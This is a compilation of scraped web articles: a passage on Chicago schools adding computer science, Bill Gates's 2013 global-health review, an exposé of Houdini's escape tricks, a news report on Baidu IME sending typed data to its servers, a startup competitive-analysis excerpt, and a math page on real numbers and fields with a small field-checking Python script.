But Chicago is poised to bump up computer science into the core curriculum, according to a report from the Chicago Sun-Times.

In the next three years, every high school will offer a foundational computer science course, and within five years, CPS plans to be the first urban district offering kindergarten through eighth-grade computer courses, officials said. “Among all S.T.E.M. careers, computer science represents one of the most dynamic and fast-growing fields, and according to the Bureau of Labor Statistics, by 2020, the U.S. will have one million more jobs in computing than they have trained professionals to fill them,” [Chicago Public] Schools CEO Barbara Byrd-Bennett said.

The race to get kids coding is heating up around the country. Startups and innovators are creating robots to make coding more kid-friendly, and organizations like Codeacademy have encouraged kids to set up after-school coding clubs.

CompTIA, the nonprofit association for the IT industry, weighed in on Chicago’s initiative and applauded the school district for forging ahead with the digital future.

“Early identification of students who have a real aptitude for computers and technology is a key factor in educating these kids on the many career opportunities available to them later in life,” said Todd Thibodeaux, president and chief executive officer of CompTIA, in an official statement.

“More importantly, technical literacy is a prerequisite for virtually every occupation in today's information economy, even beyond technology positions,” Thibodeaux continued. “We applaud the Chicago Public schools for taking this important step. By expanding access to technology in the classroom, students will be better prepared and more eager to pursue advanced degrees and professional certifications and embark on careers that offer good pay and opportunities for advancement and growth.”

Some Chicago teachers openly applauded the move:

Well, this is a step in the right direction: CPS to add computer science as core subject - http://t.co/bMHofA1imh http://t.co/mtYHuurISy — Roxana Hadad (@rhadad) December 10, 2013

And teachers outside the Chicago area are already wishing their school districts would follow in Chitown’s footsteps:

@gochemonline Our 5th Graders are loving it too! We should all follow Chicago and make Computer Science a regular part of the curriculum! — Jenny Kirsch (@MsJennyKirsch) December 12, 2013

Which raises a good question: Is Chicago ahead of the curve or is it overly aggressive to introduce kindergartners to computer programming?

Good News You Might Have Missed in 2013


Comments:" Good News You Might Have Missed in 2013 "

URL:http://www.thegatesnotes.com/Personal/Year-in-Review-2013


December 23, 2013 | By Bill Gates

You’re probably seeing a lot of people’s year-end lists right now, going through the best movies, books, YouTube clips, grumpy cat memes, etc.

I thought I would share a different kind of list: some of the good news you might have missed. I’ve limited my list to global health and development, where Melinda and I spend a lot of time, but even so, there’s a lot to report. If you measure progress by the number of children who die of preventable causes, or by the number of people who escape extreme poverty—as I do—then 2013 was definitely a good year.

For example:

We got smarter and faster at fighting polio. You may have heard about recent polio outbreaks in Syria, Kenya, and Somalia. What you may not know is just how rapid and effective the response has been. It looks like the outbreak in the Horn of Africa was controlled in 4 months, less than half the time it took to control an outbreak there in 2005. That speed is due in part to the work done at the Global Vaccine Summit held in Abu Dhabi this year. In the past, the world has had to make tough trade-offs between responding to outbreaks, improving routine immunization, and fighting the disease in the last three countries where polio is still circulating (Afghanistan, Pakistan, and Nigeria). There was no coordinated plan or long-term funding for doing all three at once. At the summit the world got both. We adopted a comprehensive plan for pursuing all three goals, including making the world polio-free by 2018. And more than 30 donors—including a number of very generous private individuals—backed the plan with a total of $4 billion in long-term funding. That means we won’t have to make those trade-offs anymore. It’s a huge step forward.

There’s also great news from India. In early 2014, India will have gone three years without a single polio case (assuming no new ones are reported between now and then). That’s a testament to the fantastic job they’ve done immunizing every child, even in the most remote parts of the country. Now they’re focused on keeping the disease from coming back.

Next door, in Pakistan, the political leaders are clearly resolved to get polio out of the country once and for all. When I met Prime Minister Nawaz Sharif this fall, he made it clear that he sees vaccinating children as a matter of justice. Despite the ongoing violence there and in Afghanistan—including horrifying reprisals against vaccine workers—the next couple of years are a good opportunity for us to make progress on this goal.

Child mortality went down—again. One of the yearly reports I keep an eye out for is “Levels and Trends in Child Mortality.” The title doesn’t sound especially uplifting, but the 2013 report shows amazing progress—for example, half as many children died in 2012 as in 1990. That’s the biggest decline ever recorded. And hardly anyone knows about it! If you want to learn more—and I’d urge you to—the report has a good at-a-glance summary on page 3.

The poverty rate went down—again. If you want to read just one article that explains the state of the world’s poor and the future of the fight against poverty, check out “Not Always With Us,” which the Economist ran in June. It gives a short but thorough overview of the progress so far—the poverty rate has dropped by half since 1990—and the prospects for keeping it going. As the article says, the biggest factor in reducing poverty over the past few decades has been economic growth—growth that touches not just those who are already rich, but a broad range of people. We’ll need to maintain this growth in the coming decades to keep the poverty numbers coming down. That’s one reason I argue for stepping up our investments on health: Health may not cause growth directly, but it does help lay the foundation for it. I never miss an issue of the Economist, and this might be the best piece they ran this year.

Rich countries re-committed to saving lives. Just this month, donors met in Washington, D.C., to renew their funding commitments to the Global Fund to Fight AIDS, TB, and Malaria. I was there and I got to meet Connie Mudenda, a Zambian woman living with HIV who started getting treatment in 2004 thanks to the Global Fund. The medicine she takes costs just 40 cents a day, and it helped her get healthy, go back to work, and support her family. Connie says that a decade ago, she’d often see people who were so sick with AIDS that they couldn’t even walk. A family member would push them down the street in a wheelbarrow. Today, though, 80 percent of Zambians with HIV have access to treatment, the country’s economy is growing, and Connie says the wheelbarrows have vanished.

There’s a terrible Catch-22 in global health: You need new tools to fight diseases, but if you can’t pay to deliver them, they don’t get made; and if they don’t get made, then no one gives money to deliver them. So it’s fantastic that donors are stepping up to avoid this problem by making big commitments to the Global Fund. Here’s a handy infographic that shows what a massive impact the Fund has had.

A fantastic Web site got launched. If you love data, and if you’re curious about what causes the most suffering around the world, you should check out the Global Burden of Disease Web site, which was launched early this year. (The foundation helped pay for it.) Personally I am a yes on both categories, which is why I have spent a lot of time on there. It lets you make beautiful charts that help you understand the impact of disease in different countries and even see how things change over time.

On a personal note, I should say how grateful I am to everyone who made time to meet with me, from world leaders to health workers in India, Nigeria, Pakistan, and around the globe. Some of these workers take great risks to help people, facing attacks from extremists in order to vaccinate children. They are true global-health heroes.

What’s Ahead in 2014

Next year I’m excited about the continued rollout of a vaccine called pentavalent (because it prevents five diseases). Next year it will be available in South Sudan, the last of the 73 poorest countries to introduce it. India just announced that they’ll start giving it to every child in the nation in 2014. If other countries follow India’s example, pentavalent could prevent 7 million deaths by 2020. Next up are new vaccines to prevent pneumonia and rotavirus (which causes diarrhea). And we’re seeing more middle-income countries like China and India develop the ability to manufacture vaccines, which drives the cost down.

Crucial to delivering all these vaccines is GAVI, an alliance that has helped 440 million children get immunized since 2000. (Go back and read that again: 440 million.) Next year GAVI will be asking donors to renew their commitments, just as the Global Fund did this year. It will be a challenge to raise more money, but I know from experience that people want to help kids get vaccinated when they see what a phenomenal impact it has. It’s hard to resist the thrill of helping to save the life of a single child, let alone millions.

One last note about 2014: I’ll be publishing my sixth annual letter in January. This time I’m planning to take a slightly different tack from years past—Melinda and I will be tackling some of the biggest myths we encounter in our work on health and poverty. It should be a fun one to write. If you’d like to get an e-mail notice when the letter is out, you can sign up here.


Exposing Houdini’s Tricks of Magic | Modern Mechanix


Comments:" Exposing Houdini’s Tricks of Magic | Modern Mechanix "

URL:http://blog.modernmechanix.com/exposing-houdinis-tricks-of-magic/


Exposing Houdini’s Tricks of Magic

By R. D. ADAMS

The mechanic who made Houdini’s Trick Magic Apparatus

Harry Houdini, Prince of Magicians, carried with him to the grave the secrets of his extraordinary feats of illusion. Only one man, the artisan who made his magic apparatus, knows the working secrets of Houdini’s most mystifying stunts. That man, Mr. R. D. Adams, continues here his fascinating expose of the master magician’s methods.

HOUDINI was a master at the art of obtaining free publicity. No performer ever put on as many free shows for the purpose of breaking into print, and for that matter, few if any, were ever as liberal as he in the matter of entertaining lodges and other groups without charge. Many times he risked death in his publicity seeking stunts.

“If the public,” he once told me, “knew how much I really flirt with death in some of my stunts, I would never be accused of getting advertising free.”

Frequently Houdini permitted himself to be locked in a regulation steel safe. There was only one way for him to free himself— with the aid of a small screwdriver with which he invariably was armed for this feat. It seems comparatively easy for one possessed of his uncanny knowledge of locks to unscrew the plate covering of tumblers which control the bolt of a safe. But when one remembers that in most instances the prisoner was so closely wedged into the vault that he could barely move his hands, that he was forced to operate in pitch darkness, guided only by his sense of touch, the feat becomes quite complicated. Once he had pressed the tumblers in the proper order, of course the door would swing open. But if by some misadventure in the darkness, he had disarranged the mechanism, those on the outside would have been unable to shoot the bolts with the aid of the combination knob. The prospect of being enclosed in a vault with only sufficient air to sustain life for a few minutes and being dependent upon a professional safecracker for rescue in case you happen to jam the mechanism of the lock is not a very inviting one.

For years Houdini’s best avenue to the front page of the newspaper was by escaping from prison cells. Although he was often forced to strip naked before being locked up and was subjected to the most minute search, he was never without a picklock. Sometimes he secreted it in the cell while he was inspecting it prior to incarceration. A bit of wax and it could instantly be fastened on the lower side of a bar. Sometimes the pick was taped in the armpit or on the sole of his foot. And Houdini, with one glance at the lock of the cell he was inspecting, knew whether the pick he would have available would do the work desired of it.

In recounting to me some of his narrow escapes, Houdini once told of an experience with his trunk trick. At that time he was permitting committees to handcuff him, place him in a trunk, rope it securely and toss him into a river or lake, while thousands, including reporters and news photographers looked on.

The escape was made in the same manner of the familiar stage trick in which the magician is locked inside a trunk and within a few seconds after it is slipped behind a screen, changes places with a lady assistant—with the aid of a sliding panel.

Immediately Houdini got into the trunk for his stunt he went to work on his handcuffs and other shackles, and was free of them by the time the roping had been done. On one occasion the trunk sank rapidly and stuck on a muddy bottom, panel side down. It was only by the most desperate efforts, Houdini was able to force the panel through the sticky mud and escape drowning.

“That gave me a lesson,” he said. “Thereafter I made it a point to have the panel part way open before the bottom was reached. Sometimes I would be out and have the panel shifted back in place without reaching the bottom.”

Of course, one of the essential points in this performance was to have an assistant who saw to it that all the roping done would not make it impossible to move the panel.

Houdini’s famed “disappearance through a brick wall” was one of his most widely applauded stunts. That it mystified the public is putting it mildly. Just a short time ago a leading scientific journal announced that the magician made his disappearance by means of a trapdoor on one side of the wall and came up through a similar channel on the other. That was wholly impossible. A trapdoor, regardless of how cleverly it had been constructed, would have been detected by the investigating committee. And besides to mystify his audience still further and demonstrate that a trapdoor was not used, a large sheet of paper and sometimes a sheet of plate glass was placed upon the floor of the stage and the brick wall built upon it. Passing through glass into trapdoors and vice versa was not possible even for the great man of mystery.

Here is how Houdini operated: A dozen or more bricklayers in overalls appeared before the audience and built a bona fide brick wall seven or eight feet high extending from the footlights to almost the rear of the stage. When it was completed, Houdini was ready to “disappear”. After a few appropriate remarks, he stepped behind a small screen, something like a prompter’s box, which the bricklayers pushed slowly to the center of the wall. The bricklayers moved over to the other side and adjusted a similar screen there opposite the first one. “Here I am, here I am,” Houdini would shout and waving arms thrust through holes in the screen gave evidence of the fact.

Then the arms would disappear and Houdini would step forth from the screen on the other side of the wall.

Houdini disappeared through the wall only in the minds of the exceedingly gullible. As a matter of fact while the first screen, behind which he had stepped, was being pushed back against the wall, he leaped into a pair of blue jumpers and pulled a workman’s cap down far over his face. When the screen touched the wall, he was one of the bricklayers as far as the audience was concerned. He got behind the second screen disguised as a bricklayer. From this point he did his calling to the audience. Mechanical arms and hands, operated by a hidden rope leading to the wings, furnished the gestures which convinced the audience Houdini was behind screen No. 1 instead of No. 2, completing the illusion.

Houdini probably possessed more information about magic and conjuring than all other artists combined. He had a library of hundreds of volumes dealing with this subject and occasionally he would completely mystify his friends with a stunt that was generations old. He once told me of a private performance he put on to entertain a small group of friends and completely mystified them. The trick itself was an ancient one. Calling for three of the ladies to hand him their handkerchiefs, he knotted them together and announced that he would have them appear anywhere the audience suggested, the suggestions to be made on slips deposited in a hat. A child drew one of the slips out of a hat, suggesting that the handkerchiefs reappear on the steps of a public institution three miles away. And they were found there a half hour later soldered in a tin box that had to be cut open.

Here were the steps in the deception. When Houdini knotted the handkerchiefs, he substituted three others for the ones in question and placed them under the dish cover. When he collected the slips of paper, he dropped in a few slips on top which he himself had written, each one designated the steps of the institution as the place the handkerchiefs were to be whisked. And while fumbling with the dish cover, he accidentally broke it. It was necessary to step to one side and obtain another of the same kind from his assistant who, during the process, was presented with the original handkerchiefs Houdini had palmed.

By stalling long enough to give time for another confederate to seal the handkerchiefs in the box and get a good start of the committee, it was perfectly simple to have the missing articles found as requested.

Having convinced most of the credulous that no shackles or bolts could imprison him, Houdini set out to prove it was impossible to entomb him—even in the grave.

In scores of cities he invited workmen to fashion a packing box that would hold him prisoner and various artisans, jealous of their craftsmanship, spent much time trying to devise boxes that the man of mystery could not escape from. The boxes made by the determined workmen would be brought upon the stage, Houdini would step inside and with a mighty pounding and at the expenditure of an unusual supply of nails, the lid would be hammered down with unusual tightness and solidity.

Sometimes a full half hour would elapse before Houdini, who of course worked surrounded by the usual screen, would liberate himself. And invariably the orchestra would play loudly while he was making his escape in order that no nails would emit a screech as they were being forced out of the wood into which they had been driven.

The secret of the escape was this: Houdini, upon entering the box, invariably had concealed under his clothing a device weighing two or three pounds which worked something on the order of an automobile jack. It consisted of two steel pipes one an inch and the other three fourths of an inch in diameter which telescoped together. At the top and the bottom of this “Open Sesame” was a T shaped bar four or five inches long and an inch wide. The pipes, threaded on the outside were held together in the center by a turn-buckle which when twisted by Houdini’s muscular hands exerted a pressure no nails could withstand. Having once forced off a board large enough to permit his escape, all Houdini had to do was to replace the board and press the nails back into the original holes while the orchestra drowned his carpentering.

As a variance of this trick, Houdini permitted glaziers to place him in a glass box and seal the cracks with putty. As soon as he was behind the screen, he would exert enough pressure to break the putty, carefully holding the glass to prevent it from crashing, step out, reach into his cabinet of many secret compartments for his own glazing tools and replace the glass. If in the process of his operations, he broke the glass, he had other sheets of the same size hidden in the cabinet with which to replace the shattered one.

I have spoken before of Houdini’s great lung capacity. But by diligent practice he also brought himself to a point where he could exist for a long period on an unbelievably small amount of air. This stood him in good stead during his experiences in packing boxes and glass cases. It also enabled him to stage a great publicity feat in California where he permitted himself to be placed in a casket and be buried some feet under ground. It was noticeable that he chose for the scene of the demonstration a spot where the soil was extremely light in weight, else his task might have been impossible even with the aid of his jack which had enabled him to break out of so many packing boxes. I did not witness this performance, but I very much suspect that the jack enabled him to force up the coffin lid to a position where he could bring his Herculean back and shoulder muscles into play effectively enough to break forth from the grave.


Free Chinese software secretly transmitting Japanese users’ data - AJW by The Asahi Shimbun


Comments:"Free Chinese software secretly transmitting Japanese users’ data - AJW by The Asahi Shimbun"

URL:http://ajw.asahi.com/article/behind_news/social_affairs/AJ201312260081


Free online software provided by China's Baidu search engine has been covertly sending almost all information inputted in Japanese to Baidu Inc.’s servers, according to a computer security company.

According to Takayuki Sugiura, president of NetAgent, when individuals use the Baidu IME software, information entered in full-width characters, kanji converted from hiragana, computer ID numbers and information on e-mail programs and word-processing programs being used, are automatically sent to Baidu Inc.’s servers in Japan.

“I want people to stop using the software until it is revised,” Sugiura said.

Baidu Inc. says on its webpage that the Baidu IME program, released in 2010, has a function to send inputted data to its servers so that it can improve its Japanese conversion capabilities.

Although this automatic data transmitting function is switched off in the default setting, Sugiura found that Baidu IME secretly sends users’ information even when the function is turned off.

“It is a big problem that it sends data even if the function is switched off,” Sugiura said.

If users write in half-size characters and numbers, their information, such as IDs, passwords, and telephone numbers, is not sent, Sugiura said.

Sugiura said Baidu’s Japanese input software for smartphones, named Simeji, is also transmitting inputted user data that it is not supposed to.

Why Entrepreneurs Are Bad at Finding Their Competition (and how you can do better) — Brian Sirkia


Comments:"Why Entrepreneurs Are Bad at Finding Their Competition (and how you can do better) — Brian Sirkia"

URL:http://www.berserkia.com/blog/doing-a-competitive-analysis


It generally takes 20-30 hours to dig up all of the players in a space, which seems like a long time to spend looking. But, compared to spending 6-12 months building a product, 20-30 hours now isn't bad at all. Not putting in the hard yards looking is being blissfully ignorant. 

That doesn't mean that just because there's always lots of competition, the opportunity isn't there. If an entrepreneur spots a pain point, that means the market for solving it hasn't been completely filled. More importantly, a thorough market analysis is not meant to be discouraging: it's a way to become an expert in a space and learn vicariously through competition.

This is my process of performing a market analysis, using the example of a fake Rideshare website:

1) Make a Google Spreadsheet with the following columns: "Name", "Website", "Year Founded", "Funding", "Traction", "Strengths", and "Opportunities". Traction is how many users they have, their growth, and ideally, revenue; Strengths is what they're doing well; and Opportunities is what you plan to do differently/better.

What are the 'real numbers,' really?


Comments:"What are the 'real numbers,' really?"

URL:http://www.math.vanderbilt.edu/~schectex/courses/thereals/


It is true that the real numbers are 'points on a line,' but that's not the whole truth. This web page explains that the real number system is a Dedekind-complete ordered field. The various concepts are illustrated with several other fields as well. Version of 11 Nov 2009 by Eric Schechter. If you find any errors, or see anything that isn't explained clearly enough, or have any other comments about this page, please write to me.
What are the "real numbers," really?

The short, simple answer used in calculus courses is that a real number is a point on the number line. That's not the whole truth, but it is adequate for the needs of freshman calculus. The freshman calculus course (at most universities nowadays) follows the 17th century style of Newton and Leibniz, emphasizing computations and omitting many proofs. The omitted proofs depend on a careful explanation of what the "real numbers" really are. That explanation and those proofs were not discovered until the 19th century, after Newton and Leibniz were long dead.

A proper explanation of the real numbers nowadays is covered, if at all, in a course in "real analysis" in the junior or senior year of students who are majoring in mathematics. Surprisingly few students take such a course; perhaps that's because it is too algebraic for the analysts' taste and too analytic to please the algebraists.

In this web page, I'll discuss the mathematical meaning of "real number." Before that, I want to discuss this more elementary question: where did the name "real" come from? (It turns out to have little to do with the deeper properties of real numbers.) To answer that question, I first need to talk about complex numbers.

Treating points in the plane as numbers

There is a natural way to "add" or "multiply" two points in the Euclidean plane. By "natural" I mean that the definitions have turned out to be useful for many applications, and that the definitions are fairly simple. Unfortunately, the definitions take their simplest forms if we use different coordinate systems for the addition and multiplication operations.
  • The "addition" of points is described most simply as vector addition. A vector can be represented by a directed line-segment; two vectors are considered equal if they point in the same direction and have the same length. (See diagram.) We can change the representation of a vector by moving it (i.e., "translating" it) to a new position parallel to the original position.

    To add two vectors V1 and V2, represent them with directed line-segments so that the initial end of V2 is located at the terminal end of V1. Thus the arrows in the diagram form a path: start at the initial end of V1, proceed to its terminal end, then turn a corner and follow V2 from its initial end to its terminal end. The sum, or resultant, V1+V2, is the journey going from the initial end of V1 to the terminal end of V2. That sum is represented by a single directed line-segment, the dashed third side of the triangle.

    To represent vectors with the Cartesian coordinate system, draw a vector V so that its initial end is at the origin (0,0). Then the coordinates of the location of its terminal end are used as the coordinates of the vector. (See diagram.)

    If we use that coordinate system, then the formula for vector addition is very simple: The first coordinate of V1+V2 is the sum of the first coordinates of V1 and V2, and the second coordinate of V1+V2 is the sum of the second coordinates of V1 and V2. That is,

    (a,b) + (c,d) = (a+c, b+d)
  • The "multiplication" that we want to use can also be described in Cartesian coordinates: (a,b) ⋅ (c,d) = (ac−bd, ad+bc). But that's a bit complicated and nonintuitive; it looks somewhat arbitrary and contrived. We get a much simpler, more geometrically appealing definition if we switch to polar coordinates. Let a point be represented by <r,θ> if it has radius r and angle θ -- i.e., if it is located r units away from the origin, and on a ray that is θ radians counterclockwise from the ray that points toward the right. That point has Cartesian coordinates (r cosθ, r sinθ). If you substitute those values into our Cartesian formula for multiplication, and then simplify using some trigonometric identities, you'll end up with this much simpler definition of multiplication: If P1 has polar coordinates <r1,θ1> and P2 has polar coordinates <r2,θ2>, then the product P1P2 is defined to be the point with polar coordinates <r1r2, θ1+θ2>.

    In other words, multiply the radii and add the angles. The effect of multiplying points in the plane by P2 is to rotate the plane through an angle of θ2 and stretch (or shrink) the plane by a magnification factor of r2. This concept is very simple, and it's quite useful in engineering, which is often concerned with describing rotations (e.g., of engines).

When addition and multiplication are defined as above, then the points in the plane are called complex numbers, for reasons that will be discussed a few paragraphs from now.

Since (a,0)+(c,0)=(a+c,0) and (a,0)×(c,0)=(ac,0), the points along the horizontal axis have an arithmetic just like "ordinary" numbers; we will write (a,0) more briefly as a. For instance, (5,0) will be written as 5. The points along the vertical axis also have a shorter notation: the point (0,b) will be written more briefly as bi; for instance, (0,5) will be written as 5i. The i stands for "imaginary", for reasons explained below.

Important exercises. Using either the formula (a,b) × (c,d) = (ac−bd, ad+bc) or the definition in terms of polar coordinates, the beginner should now verify that i² = −1. That will be important in the discussion below.

Here are the answers to those two exercises: Using the Cartesian coordinate system, we compute i² = (0,1) × (0,1) = (0•0−1•1, 0•1+1•0) = (−1,0) = −1. Or, using polar coordinates: The number i has radius 1 and angle π/2. Hence the number i² has radius 1•1=1 and angle (π/2) + (π/2) = π; the complex number with those polar coordinates is −1.

What's "real" about the real numbers?

Probably the simplest way to understand "complex numbers" is to start with points in the plane, as I have done in the preceding paragraphs. However, by a historical accident, the simplest explanation was not the first explanation discovered. Indeed, the geometric, points-in-the-plane viewpoint wasn't discovered until the 19th century, long after the algebraic computations had been investigated. As early as the 16th century, mathematicians were devising new "numbers" as a way of solving polynomial equations; they were thinking in terms of algebraic formulas rather than pictures. They were particularly interested in the third and fourth degree equations at that time, but they even had new insights into the quadratic equation. The attitude that they took was something like this: We all know that there isn't really any "number" p that can satisfy the equation p² = −1. Such a "number" can only exist in our imagination. But if it somehow did exist, what kind of arithmetic rules would it have to follow?

You have to admire the genius of the 16th century mathematicians: They correctly worked out the arithmetic rules of the complex numbers despite their lack of the simple geometric model; they calculated with "numbers" whose existence they didn't even believe in!

Their terminology was unfortunate, however. There is nothing fictitious or dreamlike about rotations of engines, but the name stuck. The points on the vertical axis are now called imaginary numbers, despite the fact that they have very tangible applications. The points on the horizontal axis are (by contrast) called real numbers. All the points in the plane are called complex numbers, because they are more complicated -- they have both a real part and an imaginary part.

Thus ends our tale about where the name "real number" comes from. But we have barely begun investigating the mathematical properties associated with that name.

Getting rid of the pictures

The "point on a line" answer is not a fully satisfactory answer, because it is not axiomatic or algebraic. It relies on pictures that we don't really understand. For instance, the set of real numbers and the set of rational numbers have essentially the same picture, but their algebraic properties differ in ways that are very important for analysts.

Imagine studying that picture of a line under a super microscope. If you could magnify the line at a very high power -- say at a magnification of a googolplex, or better yet a magnification of infinity -- would it still look the same? Or would you see a row of dots separated by spaces, like the dots in a picture in a newspaper? (It turns out that, in some sense, the real numbers would still look like a line under infinite magnification, but the rational numbers would be dots separated by spaces. But that is only a vague and intuitive statement, not anything precise that we can use in proofs.)

The only way to get rigorous answers to these questions is to set up a very careful system of axioms about geometry ... but that amounts to the same thing as setting up a careful set of axioms about the algebraic properties of the real numbers. It turns out that the latter is a little easier, so we may as well concentrate on the algebraic aspects of the situation. To answer questions like this, ultimately we have to get away from the pictures; we have to understand the real numbers entirely in terms of formulas.

As a preview, here is the definition that we're going to end up with: the real line is a Dedekind-complete ordered field. That's complicated, so we'll work our way up to it in stages. We'll discuss:

  • What is a field?
  • What is an ordered field?
  • What is a Dedekind-complete ordered field?
  • Why do I say that the real line is a Dedekind-complete ordered field? How can that be a definition?

Groups and fields

First of all, a group is a mathematical object; it is a triple (X,e,*) with these properties:
  • X is a nonempty set.
  • e is a specially chosen member of the set X. It is called the identity of the group.
  • * is a binary operation on X, which we may call the group operation. This means that whenever p and q are members of X, then p*q is also a member of X.
  • (p*q)*r = p*(q*r) for all p,q,r in X.
  • p*e = e*p = p for every p in X.
  • For each p in X, there exists at least one corresponding q in X that satisfies p*q = q*p = e. (It can be shown that there is at most one such q, and thus q is uniquely determined by p; we call q the inverse of p.)
Exercises:
  • The identity is uniquely determined --- i.e., if p*e1 = e1*p = p and p*e2 = e2*p = p for all p in X, then e1 = e2.
  • Inverses are uniquely determined --- i.e., if p*q1 = e and p*q2 = e then q1 = q2.

The group is said to be abelian (or commutative) if it also satisfies this property:

  • p*q = q*p for all p,q in X.

Examples:

  • (Z,0,+) is an abelian group, where Z is the set of all integers
  • ({even integers}, 0,+) is an abelian group
  • ({-1,1}, 1, x) is an abelian group
  • (R+,1,x) is an abelian group, where R+ is the set of all positive real numbers
  • (R\{0},1,x) is an abelian group, where R\{0} is the set of all nonzero real numbers. (Here "\" means the difference of two sets.)
  • (T,1,x) is an abelian group, where T is the set of all complex numbers that lie along the unit circle centered at 0

 

Now, a field is a quintuple (Y,0,+,1,×) with these properties:

  • Y is a set, 0 and 1 are two specially chosen members of Y, and + and × are two binary operations on Y.
  • 0≠1.
  • The triple (Y,0,+) is an abelian group.
  • The triple (Y\{0},1,×) is an abelian group. (Note that this group has for its set of members, all the members of Y except 0.)
  • p×(q+r) = (p×q) + (p×r) for all p,q,r in Y.
(Exercise: A few mathematicians do not include the requirement that 0≠1. Prove that there is only one "field" in which 0=1. For that field, the set Y has only one member.)

Here are a few examples:

  • The rational numbers (i.e., numbers like 3/4 and -171/25) are a field.
  • The real numbers (i.e., numbers like 87.324116279...) are a field.
  • The complex numbers are a field. (Exercise: Verify all the axioms. Also, what is the multiplicative inverse of 3+2i ?)
  • The set of all numbers of the form p+q√2, where p and q are rational numbers, is a field; it is a subset of the reals and a superset of the rationals. (Exercise: Verify all the axioms. Also, what is the multiplicative inverse of 3+2√2 ?)

Following is one more example. We will present a finite field -- that is, a field with only finitely many members. For the set Y, we'll use Y={0,1,2,3,4}. For its addition and multiplication operations, we'll use ordinary addition and multiplication, modified by this rule: If the result of addition or multiplication results in a number greater than 4, subtract 5 or 10 or 15, to get a number in the set Y again. In other words, we'll use these tables for addition and multiplication:

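     + | 0 1 2 3 4
    ---+----------
     0 | 0 1 2 3 4
     1 | 1 2 3 4 0
     2 | 2 3 4 0 1
     3 | 3 4 0 1 2
     4 | 4 0 1 2 3

     × | 0 1 2 3 4
    ---+----------
     0 | 0 0 0 0 0
     1 | 0 1 2 3 4
     2 | 0 2 4 1 3
     3 | 0 3 1 4 2
     4 | 0 4 3 2 1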

This field is sometimes called arithmetic modulo 5. (Exercises: Show that a similar field can be given with 5 replaced by any prime number. Show that there is also a field with 4 elements, and a field with 9 elements, but there is no field with exactly 6 elements. Much much harder: It can be shown that there is a field with exactly n elements, for some integer n, if and only if n is of the form p^r for some prime number p.)
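The axioms above can be checked mechanically for arithmetic modulo n. The following is an added example, not part of the original page: it tests the group and field axioms by brute force, and the function names are chosen here for illustration.

```python
from itertools import product


def is_abelian_group(elems, identity, op):
    """Brute-force check of the group axioms listed above, plus commutativity."""
    elems = list(elems)
    members = set(elems)
    if identity not in members:
        return False
    pairs = list(product(elems, repeat=2))
    # * is a binary operation on X: p*q must land back in X.
    if any(op(p, q) not in members for p, q in pairs):
        return False
    # (p*q)*r = p*(q*r) for all p, q, r.
    if any(op(op(p, q), r) != op(p, op(q, r))
           for p, q, r in product(elems, repeat=3)):
        return False
    # p*e = e*p = p for every p.
    if any(op(p, identity) != p or op(identity, p) != p for p in elems):
        return False
    # Every p has some q with p*q = q*p = e.
    for p in elems:
        if not any(op(p, q) == identity and op(q, p) == identity for q in elems):
            return False
    # Abelian: p*q = q*p.
    return all(op(p, q) == op(q, p) for p, q in pairs)


def is_field_mod(n):
    """True if ({0,...,n-1}, 0, +, 1, x) with arithmetic modulo n is a field."""
    if n < 2:
        return False  # with n = 1 we would have 0 = 1
    add = lambda p, q: (p + q) % n
    mul = lambda p, q: (p * q) % n
    if not is_abelian_group(range(n), 0, add):
        return False
    # The multiplicative group uses every member of Y except 0.
    if not is_abelian_group(range(1, n), 1, mul):
        return False
    # Distributive law: p x (q + r) = (p x q) + (p x r).
    return all(mul(p, add(q, r)) == add(mul(p, q), mul(p, r))
               for p, q, r in product(range(n), repeat=3))


def table(n, op):
    """Operation table for arithmetic modulo n; row p, column q."""
    return [[op(p, q) % n for q in range(n)] for p in range(n)]


def inverses_mod(n):
    """Multiplicative inverse of each nonzero member, where one exists."""
    return {p: q for p in range(1, n) for q in range(1, n) if (p * q) % n == 1}


if __name__ == "__main__":
    for n in range(2, 12):
        print(n, "field" if is_field_mod(n) else "not a field")
    print(inverses_mod(5))
```

Arithmetic modulo 4 fails the test because 2 × 2 = 0 leaves the set of nonzero members; the 4-element field mentioned in the exercise needs a different multiplication table.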

Ordered fields

Next, we need to define an ordered field. This is a sextuple (Y,0,+,1,×,<) where
  • (Y,0,+,1,×) is a field.
  • < is a binary relation on the set Y. This means that for each p and q in the set Y, either p < q is a true statement or p < q is a false statement. That can also be described this way: We are given some subset S of the set of all ordered pairs of elements of Y, and we abbreviate the sentence "(p,q) is a member of S" with the notation p < q.
  • For each p and q in Y, one and only one of these three statements is true: p < q,     p = q,     q < p.

    (That's called the Trichotomy Law, because we are cutting the possibilities into three cases.)

  • For all p,q,r in Y, if p < q, then p+r < q+r.
  • For all p,q in Y, if 0 < p and 0 < q, then 0 < p×q.
The reals and the rationals, with their usual orderings, are two familiar examples of ordered fields. A slightly less familiar example is given by the set of all numbers of the form p+q√2, where p and q are rational numbers. (Exercise: Show that that set is an ordered field.)

It can be shown that every ordered field contains, as a subset, an isomorphic copy of the rational numbers -- i.e., a set that is identical to the rational numbers in all its arithmetic operations; it may differ only in the names of some things, via a change in labeling. If you relabel things a bit, you can say that the rational numbers are a subset of every ordered field.

In particular, every ordered field contains infinitely many members. Therefore, the field of the arithmetic modulo 5 cannot be made into an ordered field by defining < in some clever way.

It can also be proved that, in any ordered field

  • −1 < 0, and
  • if p ≠ 0, then p² > 0.
Since i² = −1, it follows that there is no way that we can make the complex numbers into an ordered field, no matter how we define <.

Infinitesimals

This next part is optional -- i.e., you can get through the definition of the real numbers without ever thinking about infinitesimals. But I think this next part is interesting, and also makes the definition of the real numbers easier to understand.

About 300 years ago, Newton and Leibniz invented calculus. Well, that's an oversimplification. Some of the ideas of calculus were already around, but they cleaned it up and knitted it together with what we now call the Fundamental Theorem of Calculus. Newton also showed some of the ways calculus can be used -- he worked out many of the basic laws of physics, and showed how to compute the orbits of the planets much more simply and accurately than anyone had ever done before. In doing so, he contributed greatly to the beginning of the Age of Enlightenment -- an age in which people realized that they can accomplish quite a lot through reasoning, and that they don't have to just live in fear, superstition, and confusion. This may have indirectly contributed to things like the industrial revolution and the birth of democracy.

Anyway, Newton and Leibniz knew how to do many of the computations that we now teach in calculus, but they didn't know how to do satisfactory proofs of the theory behind calculus. They tried to do proofs, but their explanations were a bit lacking. Many of their explanations were based on infinitesimals -- i.e., numbers that are infinitely small but not zero. For instance, in their explanations, dy/dx did not represent a limit of changing numbers. It represented a quotient of unchanging numbers, but those numbers were infinitesimals.

